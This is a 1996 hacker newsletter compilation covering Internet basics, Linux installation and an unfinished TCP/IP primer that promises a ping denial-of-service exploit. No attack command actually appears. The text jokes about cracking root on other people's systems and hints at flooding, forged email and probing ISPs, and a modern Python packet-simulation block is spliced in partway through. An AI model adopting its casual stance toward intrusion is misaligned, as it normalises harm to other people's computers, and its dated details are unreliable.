
Hacking for Dummies

Contents of Volume 2:
Internet for Dummies
Linux!
Introduction to TCP/IP
Port Surfing!

GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 1
Internet for Dummies -- skip this if you are a Unix wizard. But if you read on you'll get some more kewl hacking instructions.

The six Guides to (mostly) Harmless Hacking of Vol. 1 jumped immediately into how-to hacking tricks. But if you are like me, all those details of probing ports and playing with hypotheses and pinging down hosts gets a little dizzying.

So how about catching our breath, standing back and reviewing what the heck it is that we are playing with? Once we get the basics under control, we then can move on to serious hacking.

Also, I have been wrestling with my conscience over whether to start giving you step-by-step instructions on how to gain root access to other peoples' computers. The little angel on my right shoulder whispers, "Gaining root without permission on other people's computers is not nice. So don't tell people how to do it." The little devil on my left shoulder says, "Carolyn, all these hackers think you don't know nothin'! PROVE to them you know how to crack!" The little angel says, "If anyone reading Guide to (mostly) Harmless Hacking tries out this trick, you might get in trouble with the law for conspiracy to damage other peoples' computers." The little devil says, "But, Carolyn, tell people how to crack into root and they will think you are KEWL!" So here's the deal. In this and the next few issues of Guide to (mostly) Harmless Hacking I'll tell you several ways to get logged on as the superuser in the root account of some Internet host computers. But the instructions will leave a thing or two to the imagination.

My theory is that if you are willing to wade through all this, you probably aren't one of those cheap thrills hacker wannabes who would use this knowledge to do something destructive that would land you in jail.

*******************************************************

Technical tip: If you wish to become a *serious* hacker, you'll need Linux (a freeware variety of Unix) on your PC. One reason is that then you can crack into root legally all you want -- on your own computer. It sure beats struggling around on someone else's computer only to discover that what you thought was root was a cleverly set trap and the sysadmin and FBI laugh at you all the way to jail.

Linux can be installed on a PC with as little as a 386 CPU, only 2 Mb RAM and as little as 20 MB of hard disk. You will need to reformat your hard disk. While some people have successfully installed Linux without trashing their DOS/Windows stuff, don't count on getting away with it. Backup, backup, backup!
*******************************************************

You can go to jail warning: Crack into root on someone else's computer and the slammer becomes a definite possibility. Think about this: when you see a news story about some hacker getting busted, how often do you recognize the name? How often is the latest bust being done to someone famous, like Dark Tangent or se7en or Emmanuel Goldstein? How about, like, never! That's because really good hackers figure out how to not do stupid stuff. They learn how to crack into computers for the intellectual challenge and to figure out how to make computers safe from intruders. They don't bull their way into root and make a mess of things, which tends to inspire sysadmins to call the cops.

*******************************************************

Exciting notice: Is it too boring to just hack into your own Linux machine? Hang in there. Ira Winkler of the National Computer Security Association, Dean Garlick of the Space Dynamics Lab of Utah State University and I are working on setting up hack.net, a place where it will be legal to break into computers. Not only that, we're looking for sponsors who will give cash awards and

scholarships to those who show the greatest hacking skills. Now does that sound like more phun than jail?

*******************************************************

So, let's jump into our hacking basics tutorial with a look at the wondrous anarchy that is the Internet.

Note that these Guides to (mostly) Harmless Hacking focus on the Internet. That is because there are many legal ways to hack on the Internet. Also, there are over 10 million of these readily hackable computers on the Internet, and the number grows every day.

Internet Basics

No one owns the Internet. No one runs it. It was never planned to be what it is today. It just happened, the mutant outgrowth of a 1969 US Defense Advanced Research Projects Agency experiment.

This anarchic system remains tied together because its users voluntarily obey some basic rules.

These rules can be summed up in two words: Unix and TCP/IP (with a nod to UUCP). If you understand, truly understand Unix and TCP/IP (and UUCP), you will become a fish swimming in the sea of cyberspace, an Uberhacker among hacker wannabes, a master of the Internet universe.

To get technical, the Internet is a world-wide distributed computer/communications network held together by a common communications standard, Transmission Control Protocol/Internet Protocol (TCP/IP) and a bit of UUCP. These standards allow anyone to hook up a computer to the Internet, which then becomes another node in this network of the Internet. All that is needed is to get an Internet address assigned to the new computer, which is then known as an Internet "host," and tie into an Internet communications link. These links are now available in almost all parts of the world.

If you use an on-line service from your personal computer, you, too, can temporarily become part of the Internet. There are two main ways to hook up to an on-line service.

There is the cybercouch potato connection that every newbie uses. It requires either a point-to-point (PPP) or SLIP connection, which allows you to
run pretty pictures with your Web browser. If you got some sort of packaged software from your ISP, it automatically gives you this sort of connection.

Or you can connect with a terminal emulator to an Internet host. This program may be something as simple as the Windows 3.1 "Terminal" program under the "Accessories" icon. Once you have dialed in and connected you are just another terminal on this host machine. It won't give you pretty pictures. This connection will be similar to what you get on an old-fashioned BBS. But if you know how to use this kind of connection, it could even give you root access to that host.

But how is the host computer you use attached to the Internet? It will be running some variety of the Unix operating system. Since Unix is so easy to adapt to almost any computer, this means that almost any computer may become an Internet host.

For example, I sometimes enter the Internet through a host which is a Silicon Graphics Indigo computer at Utah State University. Its Internet address is fantasia.idec.sdl.usu.edu. This is a computer optimized for computer animation work, but it can also operate as an Internet host. On other occasions the entry point used may be pegasus.unm.edu, which is an IBM RS 6000 Model 370. This is a computer optimized for research at the University of New Mexico.

Any computer which can run the necessary software -- which is basically the Unix operating system -- has a modem, and is tied to an Internet communications link, may become an Internet node. Even a PC may become an Internet host by running one of the Linux flavors of Unix. After setting it up with Linux you can arrange with the ISP of your choice to link it permanently to the Internet.

In fact, many ISPs use nothing more than networked PCs running Linux!
As a result, all the computing, data storage, and sending, receiving and forwarding of messages on the Internet is handled by the millions of computers of many types and owned by countless companies, educational institutions, governmental entities and even individuals.

Each of these computers has an individual address which enables it to be reached through the Internet if hooked up to an appropriate communications link. This address may be represented in two ways: as a name or a number.

The communications links of the Internet are also owned and maintained in the same anarchic fashion as the hosts. Each owner of an Internet host is responsible for finding and paying for a

communications link that will get that host tied in with at least one other host. Communications links may be as simple as a phone line, a wireless data link such as cellular digital packet data, or as complicated as a high speed fiber optic link. As long as the communications link can use TCP/IP or UUCP, it can fit into the Internet.

Thus the net grows with no overall coordination. A new owner of an Internet host need only get permission to tie into one communications link to one other host. Alternatively, if the provider of the communications link decides this host is, for example, a haven for spammers, it can cut this "rogue site" off of the Internet. The rogue site then must snooker some other communications link into tying it into the Internet again.

The way most of these interconnected computers and communications links work is through the common language of the TCP/IP protocol. Basically, TCP/IP breaks any Internet communication into discrete "packets." Each packet includes information on how to route it, error correction, and the addresses of the sender and recipient. The idea is that if a packet is lost, the sender will know it and resend the packet. Each packet is then launched into the Internet. This network may automatically choose a route from node to node for each packet using whatever is available at the time, and reassembles the packets into the complete message at the computer to which it was addressed.

These packets may follow tortuous routes. For example, one packet may go from a node in Boston to Amsterdam and back to the US for final destination in Houston, while another packet from the same message might be routed through Tokyo and Athens, and so on. Usually, however, the communications links are not nearly so tortuous. Communications links may include fiber optics, phone lines and satellites.

The strength of this packet-switched network is that most messages will automatically get through despite heavy message traffic congestion and many communications links being out of service. The disadvantage is that messages may simply disappear within the system. It also may be difficult to reach desired computers if too many communications links are unavailable at the time.
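The packetize, route, lose, resend and reassemble cycle just described, modelled as an added example that is not part of the original Guide: a toy sender splits a message into addressed, checksummed packets, a simulated network drops, damages and reorders them, and the receiver acknowledges what arrived intact so the sender resends only the rest. The host names, the acknowledgement mechanism and the SHA-256 check are illustrative assumptions, not the real TCP/IP wire format.

```python
# Toy model of packet switching as the text describes it: split, address,
# checksum, launch, lose some, resend, reassemble. Hypothetical example code,
# not TCP/IP itself.
import hashlib
import random
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple


@dataclass
class Packet:
    src: str         # sender address: every packet header names where it came from
    dst: str         # recipient address
    seq: int         # position of this chunk inside the whole message
    total: int       # how many chunks make up the message
    payload: bytes
    check: str = ""  # digest of the payload so damage in transit is detectable

    def __post_init__(self):
        if not self.check:
            self.check = hashlib.sha256(self.payload).hexdigest()

    def intact(self) -> bool:
        return hashlib.sha256(self.payload).hexdigest() == self.check


def packetize(message: bytes, src: str, dst: str, size: int) -> List[Packet]:
    """Break one message into discrete packets of at most `size` bytes."""
    chunks = [message[i:i + size] for i in range(0, len(message), size)]
    return [Packet(src, dst, seq, len(chunks), c) for seq, c in enumerate(chunks)]


class LossyNetwork:
    """Each packet picks its own route: some are lost, some damaged, order is not kept."""

    def __init__(self, drop_rate: float, corrupt_rate: float, seed: int):
        self.rng = random.Random(seed)
        self.drop_rate = drop_rate
        self.corrupt_rate = corrupt_rate

    def deliver(self, packets: List[Packet]) -> List[Packet]:
        out = []
        for p in packets:
            r = self.rng.random()
            if r < self.drop_rate:
                continue                      # lost somewhere along the way
            if r < self.drop_rate + self.corrupt_rate:
                bad = bytearray(p.payload)
                bad[0] ^= 0x01                # one flipped bit; digest no longer matches
                p = Packet(p.src, p.dst, p.seq, p.total, bytes(bad), p.check)
            out.append(p)
        self.rng.shuffle(out)                 # arrival order is not sending order
        return out


class Receiver:
    def __init__(self, address: str):
        self.address = address
        self.buffer: Dict[int, Packet] = {}
        self.seen_sources: Set[str] = set()   # what the headers give away about senders

    def accept(self, packets: List[Packet]) -> Set[int]:
        """Keep intact packets addressed to us; return the seq numbers to acknowledge."""
        for p in packets:
            self.seen_sources.add(p.src)
            if p.dst == self.address and p.intact():
                self.buffer[p.seq] = p
        return set(self.buffer)

    def reassemble(self) -> Optional[bytes]:
        """Put the chunks back in order, or None while some are still missing."""
        if not self.buffer:
            return None
        total = next(iter(self.buffer.values())).total
        if len(self.buffer) != total:
            return None
        return b"".join(self.buffer[i].payload for i in range(total))


def transmit(message: bytes, src: str, dst: str, network: LossyNetwork,
             size: int = 8, max_rounds: int = 20) -> Tuple[Optional[bytes], int, Set[str]]:
    """Send, learn what was not acknowledged, resend only that, until done or out of tries."""
    outstanding = {p.seq: p for p in packetize(message, src, dst, size)}
    rx = Receiver(dst)
    rounds = 0
    while outstanding and rounds < max_rounds:
        rounds += 1
        acked = rx.accept(network.deliver(list(outstanding.values())))
        for seq in acked:
            outstanding.pop(seq, None)
    return rx.reassemble(), rounds, rx.seen_sources


if __name__ == "__main__":
    # Constructed sample traffic; the host names are placeholders.
    text = b"our company offers LTL truck service to all major US cities."
    net = LossyNetwork(drop_rate=0.3, corrupt_rate=0.1, seed=7)
    got, rounds, sources = transmit(text, "client.example", "pegasus.unm.edu", net)
    print(rounds, "rounds,", got == text, "delivered intact, senders seen:", sources)
```

Note that the receiver learns the sender address from every packet header, damaged or not, which is the point the text makes about how hard it is to hide on the Internet.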
However, all these wonderful features are also profoundly hackable. The Internet is robust enough to survive -- so its inventors claim -- even nuclear war. Yet it is also so weak that with only a little bit of instruction, it is possible to learn how to seriously spoof the system (forged email) or even temporarily put out of commission other people's Internet host computers (flood pinging, for example.) On the other hand, the headers on the packets that carry hacking commands will give away the account information from which a hacker is operating. For this reason it is hard to hide perfectly when on the Internet.

It is this tension between this power and robustness and weakness and potential for confusion that makes the Internet a hacker playground.

For example, HERE IS YOUR HACKER TIP YOU'VE BEEN WAITING FOR THIS ISSUE: ftp://ftp.secnet.com This ftp site was posted on the BUGTRAQ list, which is dedicated to discussion of Unix security holes. Moderator is Aleph One, who is a genuine Uberhacker. If you want to subscribe to the BUGTRAQ, email LISTSERV@netspace.org with message "subscribe BUGTRAQ." Now, back to Internet basics.

History of Internet

As mentioned above, the Internet was born as a US Advanced Research Projects Agency (ARPA) effort in 1969. Its inventors called it ARPANET. But because of its value in scientific research, the US National Science Foundation (NSF) took it over in 1983. But over the years since then it gradually evolved away from any single source of control. In April 1995 NSF
cut the last apron strings. Now the Internet is run by no one. It just happens and grows out of the efforts of those who play with it and struggle with the software and hardware.

Nothing at all like this has ever happened before. We now have a computer system with a life of its own. We, as hackers, form a big part of the mutation engine that keeps the Internet evolving and growing stronger. We also form a big part of the immune system of this exotic creature.

The original idea of ARPANET was to design a computer and communications network that would eventually become so redundant, so robust, and so able to operate without centralized control, that it could even survive nuclear war. What also happened was that ARPANET evolved into a being that has survived the end of government funding without even a blip in its growth. Thus its

anarchic offspring, the Internet, has succeeded beyond the wildest dreams of its original architects.

The Internet has grown explosively, with no end in sight. At its inception as ARPANET it held only 4 hosts. A quarter of a century later, in 1984, it contained only 1000 hosts. But over the next 5 years this number grew tenfold to 10,000 (1989). Over the following 4 years it grew another tenfold to 1 million (1993). Two years later, at the end of 1995, the Internet was estimated to have at least 6 million host computers. There are probably over 10 million now. There appears to be no end in sight yet to the incredible growth of this mutant child of ARPANET.

In fact, one concern raised by the exponential growth in the Internet is that demand may eventually far outrace capacity. Because now no entity owns or controls the Internet, if the capacity of the communications links among nodes is too small, and it were to become seriously bogged down, it might be difficult to fix the problem.

For example, in 1988, Robert Morris, Jr. unleashed a "virus"-type program on the Internet commonly known as the "Morris Worm." This virus would make copies of itself on whatever computer it was on and then send copies over communications links to other Internet hosts. (It used a bug in sendmail that allowed access to root, allowing the virus to act as the superuser.)

Quickly the exponential spread of this virus made the Internet collapse from the communications traffic and disk space it tied up.

At the time the Internet was still under some semblance of control by the National Science Foundation and was connected to only a few thousand computers. The Net was shut down and all viruses purged from its host computers, and then the Net was put back into operation. Morris, meanwhile, was put in jail.

There is some concern that, despite improved security measures (for example, "firewalls"), someone may find a new way to launch a virus that could again shut down the Internet. Given the loss of centralized
control, restarting it could be much more time-consuming if this were to happen again.

But reestablishing a centralized control today like what existed at the time of the "Morris Worm" is likely to be impossible. Even if it were possible, the original ARPANET architects were probably correct in their assessment that the Net would become more susceptible to massive failure rather than less if some centralized control were in place.

Perhaps the single most significant feature of today's Internet is this lack of centralized control.

No person or organization is now able to control the Internet. In fact, the difficulty of control became an issue as early as its first year of operation as ARPANET. In that year email was spontaneously invented by its users. To the surprise of ARPANET's managers, by the second year email accounted for the bulk of the communication over the system.

Because the Internet had grown to have a fully autonomous, decentralized life of its own, in April 1995, the NSF quit funding NSFNET, the fiber optics communications backbone which at one time had given NSF the technology to control the system. The proliferation of parallel communications links and hosts had by then completely bypassed any possibility of centralized control.

There are several major features of the Internet:

* World Wide Web
-- a hypertext publishing network and now the fastest growing part of the Internet
* email -- a way to send electronic messages
* Usenet -- forums in which people can post and view public messages
* telnet -- a way to login to remote Internet computers
* file transfer protocol -- a way to download files from remote Internet computers
* Internet relay chat -- real-time text conversations -- used primarily by hackers and other Internet old-timers
* gopher -- a way of cataloging and searching for information. This is rapidly growing obsolete.

As you port surfers know, there are dozens of other interesting but less well known services such as whois, finger, ping etc.

The World Wide Web

The World Wide Web is the newest major feature of the Internet, dating from the spring of 1992.

It consists of "Web pages," which are like pages in a book, and links from specially marked words, phrases or symbols on each page to other Web pages. These pages and links together create what is known as "hypertext." This technique makes it possible to tie together many different documents which may be written by many people and stored on many different computers

around the world into one hypertext document.

This technique is based upon the Universal Resource Locator (URL) standard, which specifies how to hook up with the computer and access the files within it where the data of a Web page may be stored.

A URL is always of the form http://<rest of address>, where <rest of address> includes a domain name which must be registered with an organization called InterNIC in order to make sure that two different Web pages (or email addresses, or computer addresses) don't end up being identical. This registration is one of the few centralized control features of the Internet.

Here's how the hypertext of the World Wide Web works. The reader would come to a statement such as "our company offers LTL truck service to all major US cities." If this statement on the "Web page" is highlighted, that means that a click of the reader's computer mouse will take him or her to a new Web page with details. These may include complete schedules and a form to fill out to order a pickup and delivery.

Some Web pages even offer ways to make electronic payments, usually through credit cards.

However, the security of money transfers over the Internet is still a major issue. Yet despite concerns with verifiability of financial transactions, electronic commerce over the Web is growing fast. In its second full year of existence, 1994, only some $17.6 million in sales were conducted over the Web. But in 1995, sales reached $400 million. Today, in 1996, the Web is jammed with commercial sites begging for your credit card information.

In addition, the Web is being used as a tool in the distribution of a new form of currency, known as electronic cash. It is conceivable that, if the hurdle of verifiability can be overcome, electronic cash (often called ecash) may play a major role in the world economy, simplifying international trade. It may also eventually make national currencies and even taxation as we know it obsolete. Examples of Web
sites where one may obtain ecash include the Mark Twain Bank of St. Louis, MO (http://www.marktwain.com) and Digicash of Amsterdam, The Netherlands (http://www.digicash.com).

The almost out-of-control nature of the Internet manifests itself on the World Wide Web. The author of a Web page does not need to get permission or make any arrangement with the authors of other Web pages to which he or she wishes to establish links. Links may be established automatically simply by programming in the URLs of desired Web page links.

Conversely, the only way the author of a Web page can prevent other people from reading it or establishing hypertext links to it is to set up a password protection system (or by not having communications links to the rest of the Internet).

A problem with the World Wide Web is how to find things on it. Just as anyone may hook a new computer up to the Internet, so also there is no central authority with control or even knowledge of what is published where on the World Wide Web. No one needs to ask permission of a central authority to put up a Web page.

Once a user knows the address (URL) of a Web page, or at least the URL of a Web page that links eventually to the desired page, then it is possible (so long as communications links are available) to almost instantly hook up with this page.

Because of the value of knowing URLs, there now are many companies and academic institutions that offer searchable indexes (located on the Web) to the World Wide Web. Automated programs such as Web crawlers search the Web and catalog the URLs they encounter as they travel from hypertext link to hypertext link. But because the Web
is constantly growing and changing, there is no way to create a comprehensive catalog of the entire Web.

Email

Email is the second oldest use of the Internet, dating back to the ARPAnet of 1972. (The first use was to allow people to remotely log in to their choice of one of the four computers on which ARPAnet was launched in 1971.) There are two major uses of email: private communications, and broadcasted email. When broadcasted, email serves to make announcements (one-way broadcasting), and to carry on discussions among groups of people such as our Happy Hacker list. In the group discussion mode, every message sent by every member of the list is broadcasted to all other members.

The two most popular program types used to broadcast to email discussion groups are majordomo and listserv.

Usenet

Usenet was a natural outgrowth of the broadcasted email group discussion list. One problem with email lists is that there was no easy way for people new to these groups to join them. Another problem is that as the group grows, a member may be deluged with dozens or hundreds of email messages each day.

In 1979 these problems were addressed by the launch of Usenet. Usenet consists of news groups which carry on discussions in the form of "posts." Unlike an email discussion group, these posts are stored, typically for two weeks or so, awaiting potential readers. As new posts are submitted to a news group, they are broadcast to all Internet hosts that are subscribed to carry the news groups to which these posts belong.

With many Internet connection programs you can see the similarities between Usenet and email.

Both have similar headers, which track their movement across the Net. Some programs such as Pine are set up to send the same message simultaneously to both email addresses and newsgroups. All Usenet news readers allow you to email the authors of posts, and many also allow you to email these posts themselves to yourself or other people.

Now, here is a quick overview of the Internet basics we plan to cover in the next several issues of Guide to (mostly) Harmless Hacking:

1. Unix

We discuss "shells" which allow one to write programs ("scripts") that automate complicated series of Unix commands. The reader is introduced to the concept of scripts which perform hacking functions. We introduce Perl, which is a shell programming language used for the most elite of hacking scripts such as SATAN.

3. TCP/IP and UUCP

This chapter covers the communications links that bind together the Internet from a hackers' perspective. Extra attention is given to UUCP since it is so hackable.

4. Internet Addresses, Domain Names and Routers

The reader learns how information is sent to the right places on the Internet, and how hackers can make it go to the wrong places!
How to look up UUCP hosts (which are not under the domain name system) is included.

5. Fundamentals of Elite Hacking: Ports, Packets and File Permissions

This section lets the genie of serious hacking out of the bottle. It offers a series of exercises in which the reader can enjoy gaining access to almost any randomly chosen Internet host. In fact, by the end of the chapter the reader will have had the chance to practice several dozen techniques for gaining entry to other peoples' computers. Yet these hacks we teach are 100% legal!

Want to subscribe to this list? Email hacker@techbroker.com with the message "subscribe happyhacker." Want to share some kewl stuph with the Happy Hacker list? Send your messages to hacker@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com. Happy hacking!

Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.

GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 2
Linux!

Unix has become the primo operating system of the Internet. In fact, Unix is the most widely used operating system in the world among computers with more power than PCs.

True, Windows NT is coming up fast as a common Internet operating system, and is sooo wonderfully buggy that it looks like it could become the number one favorite to crack into. But today Unix in all its wonderful flavors still is the operating system to know in order to be a truly elite hacker.

So far we have assumed that you have been hacking using a shell account that you get through your Internet Service Provider (ISP). A shell account allows you to give Unix commands on one of your ISP's computers. But you don't need to depend on your ISP for a machine that lets you play

with Unix. You can run Unix on your own computer and with a SLIP or PPP connection be directly connected to the Internet.

*******************************************************

Newbie note: Serial Line Internet Protocol (SLIP) and Point-to-Point Protocol (PPP) connections give you a temporary Internet Protocol (IP) address that allows you to be hooked directly to the Internet. You have to use either SLIP or PPP connections to get to use a Web browser that gives you pictures instead of text only. So if you can see pictures on the Web, you already have one of these available to you.

The advantage of using one of these direct connections for your hacking activities is that you will not leave behind a shell log file for your ISP's sysadmin to pore over. Even if you are not breaking the law, a shell log file that shows you doing lots of hacker stuph can be enough for some sysadmins to summarily close your account.

*******************************************************

What is the best kind of computer to run Unix on? Unless you are a wealthy hacker who thinks nothing of buying a Sun SPARC workstation, you'll probably do best with some sort of PC. There are almost countless variants of Unix that run on PCs, and a few for Macs. Most of them are free for download, or inexpensively available on CD-ROMs.

The three most common variations of Unix that run on PCs are Sun's Solaris, FreeBSD and Linux.

Solaris costs around $700. Enough said. FreeBSD is really, really good. But you won't find many manuals or newsgroups that cover FreeBSD.

Linux, however, has the advantage of being available in many variants (so you can have fun mixing and matching programs from different Linux offerings). Most importantly, Linux is supported by many manuals, news groups, mail lists and Web
sites. If you have hacker friends in your area, most of them probably use Linux and can help you out.

*******************************************************

Historical note: Linux was created in 1991 by a group led by Linus Torvalds of the University of Helsinki. Linux is copyrighted under the GNU General Public License. Under this agreement, Linux may be redistributed to anyone along with the source code. Anyone can sell any variant of Linux and modify it and repackage it. But even if someone modifies the source code he or she may not claim copyright for anything created from Linux. Anyone who sells a modified version of Linux must provide source code to the buyers and allow them to reuse it in their commercial products without charging licensing fees. This arrangement is known as a "copyleft." Under this arrangement the original creators of Linux receive no licensing or shareware fees.

Linus Torvalds and the many others who have contributed to Linux have done so from the joy of programming and a sense of community with all of us who will hopefully use Linux in the spirit of good guy hacking. Viva Linux! Viva Torvalds!
*******************************************************

Linux consists of the operating system itself (called the "kernel") plus a set of associated programs.

The kernel, like all types of Unix, is a multitasking, multi-user operating system. Although it uses a different file structure, and hence is not directly compatible with DOS and Windows, it is so flexible that many DOS and Windows programs can be run while in Linux. So a power user will probably want to boot up in Linux and then be able to run DOS and Windows programs from Linux.

Associated programs that come with most Linux distributions may include:

* a shell program (Bourne Again Shell -- BASH -- is most common);
* compilers for programming languages such as Fortran-77 (my favorite!), C, C++, Pascal, LISP, Modula-2, Ada, Basic (the best language for a beginner), and Smalltalk;
* X (sometimes called X-windows), a graphical user interface;
* utility programs such as the email reader Pine (my favorite) and Elm.

Top ten reasons to install Linux on your PC:

1. When Linux is outlawed, only outlaws will own Linux.
2. When installing Linux, it is so much fun to run fdisk without backing up first.
3. The flames you get from asking questions on Linux newsgroups are of a higher quality than the flames you get for posting to alt.sex.bestiality.
4. No matter what flavor of Linux you install, you'll find out tomorrow there was a far more 3l1te version you should have gotten instead.

5. People who use FreeBSD or Solaris will not make fun of you. They will offer their sympathy instead.
6. At the next Def Con you'll be able to say stuph like "so then I su-ed to his account and grepped all his files for 'kissyface'." Oops, grepping other people's files is a no-no, forget I ever suggested it.
7. Port surf in privacy.
8. One word: exploits.
9. Installing Linux on your office PC is like being a postal worker and bringing an Uzi to work.
10. But -- if you install Linux on your office computer, your boss won't have a clue what that means.

What types of Linux work best? It depends on what you really want. Redhat Linux is famed for being the easiest to install. The Walnut Creek Linux 3.0 CD-ROM set is also really easy to install -- for Linux, that is! My approach has been to get lots of Linux versions and mix and match the best from each distribution.

I like the Walnut Creek version best because with my brand X hardware, its autodetection feature was a life-saver.

INSTALLING LINUX is not for the faint of heart! Several tips for surviving installation are:

1) Although you in theory can run Linux on a 286 with 4 MB RAM and two floppy drives, it is *much* easier with a 486 or above with 8 MB RAM, a CD-ROM, and at least 200 MB free hard disk space.

2) Know as much as possible about what type of mother board, modem, hard disk, CD-ROM, and video card you have. If you have any documentation for these, have them on hand to reference during installation.

3) It works better to use hardware that is name-brand and somewhat out-of-date on your computer. Because Linux is freeware, it doesn't offer device drivers for all the latest hardware. And if your hardware is like mine -- lots of Brand X and El Cheapo stuph -- you can take a long time experimenting with what drivers will work.

4) Before beginning installation, back up your hard disk(s)!
In theory you can install Linux without harming your DOS/Windows files. But we are all human, especially if following the advice of point 7).

5) Get more than one Linux distribution. The first time I successfully installed Linux, I finally hit on something that worked by using the boot disk from one distribution with the CD-ROM for another. In any case, each Linux distribution had different utility programs, operating system emulators, compilers and more. Add them all to your system and you will be set up to become beyond elite.

6) Buy a book or two or three on Linux. I didn't like any of them! But they are better than nothing. Most books on Linux come with one or two CD-ROMs that can be used to install Linux. But I found that what was in the books did not exactly coincide with what was on the CD-ROMs.

7) I recommend drinking while installing. It may not make debugging go any faster, but at least you won't care how hard it is.

Now I can almost guarantee that even following all these 6 pieces of advice, you will still have problems installing Linux. Oh, do I have 7 advisories up there? Forget number 7. But be of good cheer. Since everyone else also suffers mightily when installing and using Linux, the Internet has an incredible wealth of resources for the Linux-challenged.

If you are allergic to getting flamed, you can start out with Linux support Web sites.

The best I have found is http://sunsite.unc.edu:/pub/Linux/. It includes the Linux Frequently Asked Questions list (FAQ), available from sunsite.unc.edu:/pub/Linux/docs/FAQ.

In the directory /pub/Linux/docs on sunsite.unc.edu you'll find a number of other documents about Linux, including the Linux INFO-SHEET and META-FAQ. The Linux HOWTO archive is on the sunsite.unc.edu Web
site at: /pub/Linux/docs/HOWTO. The directory /pub/Linux/docs/LDP contains the current set of LDP manuals.

You can get ``Linux Installation and Getting Started'' from sunsite.unc.edu in /pub/Linux/docs/LDP/install-guide. The README file there describes how you can order a printed copy of the book of the same name (about 180 pages).

Now if you don't mind getting flamed, you may want to post questions to the amazing number of Usenet news groups that cover Linux. These include:

comp.os.linux.advocacy            Benefits of Linux compared
comp.os.linux.development.system  Linux kernels, device drivers
comp.os.linux.x                   Linux X Window System servers
comp.os.linux.development.apps    Writing Linux applications
comp.os.linux.hardware            Hardware compatibility
comp.os.linux.setup               Linux installation
comp.os.linux.networking          Networking and communications
comp.os.linux.answers             FAQs, How-To's, READMEs, etc.
linux.redhat.misc
alt.os.linux                      Use comp.os.linux.* instead
alt.uu.comp.os.linux.questions    Usenet University helps you
comp.os.linux.announce            Announcements important to Linux
comp.os.linux.misc                Linux-specific topics

Want your Linux free? Tobin Fricke has pointed out that "free copies of Linux CD-ROMs are available at the Linux Support & CD Giveaway web site at http://emile.math.ucsb.edu:8000/giveaway.html. This is a project where people donate Linux CD's that they don't need any more. The project was seeded by Linux Systems Labs, who donated 800 Linux CDs initially! Please remember to donate your Linux CD's when you are done with them. If you live near a computer swap meet, Fry's, Microcenter, or other such place, look for Linux CD's there. They are usually under $20, which is an excellent investment. I personally like the Linux Developer's Resource by Infomagic, which is now up to a seven CD set, I believe, which includes all major Linux distributions (Slackware, Redhat, Debian, Linux for DEC Alpha to name a few) plus mirrors of tsx11.mit.edu and sunsite.unc.edu/pub/linux plus much more. You should also visit the WONDERFUL linux page at http://sunsite.unc.edu/linux, which has tons of information, as well as the http://www.linux.org/. You might also want to check out http://www.redhat.com/ and http://www.caldera.com/ for more information on commercial versions of linux (which are still freely available under GNU)."

How about Linux security? Yes, Linux, like every operating system, is imperfect. Eminently hackable, if you really want to know. So if you want to find out how to secure your Linux system, or if you should
come across one of the many ISPs that use Linux and want to go exploring (oops, forget I wrote that), here's where you can go for info:

ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks
ftp://info.cert.org/pub/tech_tips/root_compromise
http://bach.cis.temple.edu/linux/linux-security/
http://www.geek-girl.com/bugtraq/

There is also help for Linux users on Internet Relay Chat (IRC). Ben (cyberkid@usa.net) hosts a channel called #LinuxHelp on the Undernet IRC server.

Last but not least, if you want to ask Linux questions on the Happy Hacker list, you're welcome. We may be the blind leading the blind, but what the heck!

Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.

GUIDE TO (mostly) HARMLESS HACKING Vol. 2 Number 3

Introduction to TCP/IP. That means packets! Datagrams! Ping oversize packet denial of service exploit explained. But this hack is a lot less mostly harmless than most. Don't try this at home...

If you have been on the Happy Hacker list for awhile, you've been getting some items forwarded from the Bugtraq list on a new ping packet exploit.

Now if this has been sounding like gibberish to you, relax. It is really very simple. In fact, it is so simple that if you use Windows 95, by the time you finish this article you will know a simple, one-line command that you could use to crash many Internet hosts and routers.

**************************************************
YOU CAN GO TO JAIL WARNING: This time I'm not going to implore the wannabe evil genius types on this list to be virtuous and resist the temptation to misuse the information I'm about to give them. See if I care! If one of those guys gets caught crashing thousands of Internet hosts and routers, not only will they go to jail and get a big fine. We'll all think he or she is a dork. This exploit is a no-brainer, one-line command from Windows 95. Yeah, the operating system that is designed for clueless morons. So there is nothing elite about this hack. What is elite is being able to thwart this attack.
**************************************************

**************************************************
NEWBIE NOTE: If packets, datagrams, and TCP/IP aren't exactly your bosom buddies yet, believe me, you need to really get in bed with them in order to call yourself a hacker. So hang in here for some technical stuff. When we are done, you'll have the satisfaction of knowing you could wreak havoc on the Internet, but are too elite to do so.

A packet is a way to send information electronically that keeps out errors. The idea is that no transmission technology is perfect. Have you ever played the game "telephone"? You get a dozen or so people in a circle and the first person whispers a message to the second. Something like "The bun is the lowest form of wheat." The second person whispers to the third, "A bum is the lowest form of cheating." The third whispers, "Rum is the lowest form of drinking." And so on. It's really fun to find out how far the message can mutate as it goes around the circle.

But when, for example, you get email, you would prefer that it isn't messed up. So the computer that sends the email breaks it up into little pieces called datagrams. Then it wraps things around each datagram that tell what computer it needs to go to, where it came from, and that check whether the datagram might have been garbled. These wrapped up datagram packages are called "packets."

Now if the computer sending email to you were to package a really long message into just one packet, chances are pretty high that it will get messed up while on its way to the other computer. Bit burps. So when the receiving computer checks the packet and finds that it got messed up, it will throw it away and tell the other computer to send it again. It could take a long time until this giant packet gets through intact.

But if the message is broken into a lot of little pieces and wrapped up into bunches of packets, most of them will be good and the receiving computer will keep them. It will then tell the sending computer to retransmit just the packets that messed up. Then when all the pieces finally get there, the receiving computer puts them together in the right order and lo and behold, there is the complete, error-free email.

TCP/IP stands for Transmission Control Protocol/Internet Protocol. It tells computers that are hooked up to the Internet how to package up messages into packets and how to read these packets from other computers. Ping does not use TCP at all, though: its packets are ICMP messages carried directly inside IP packets.
**************************************************

"Ping" is a command that sends a feeler out from your computer to another computer to see if it is turned on and hooked to the same network you are on. On the Internet there are some ten million computers that you can ping.

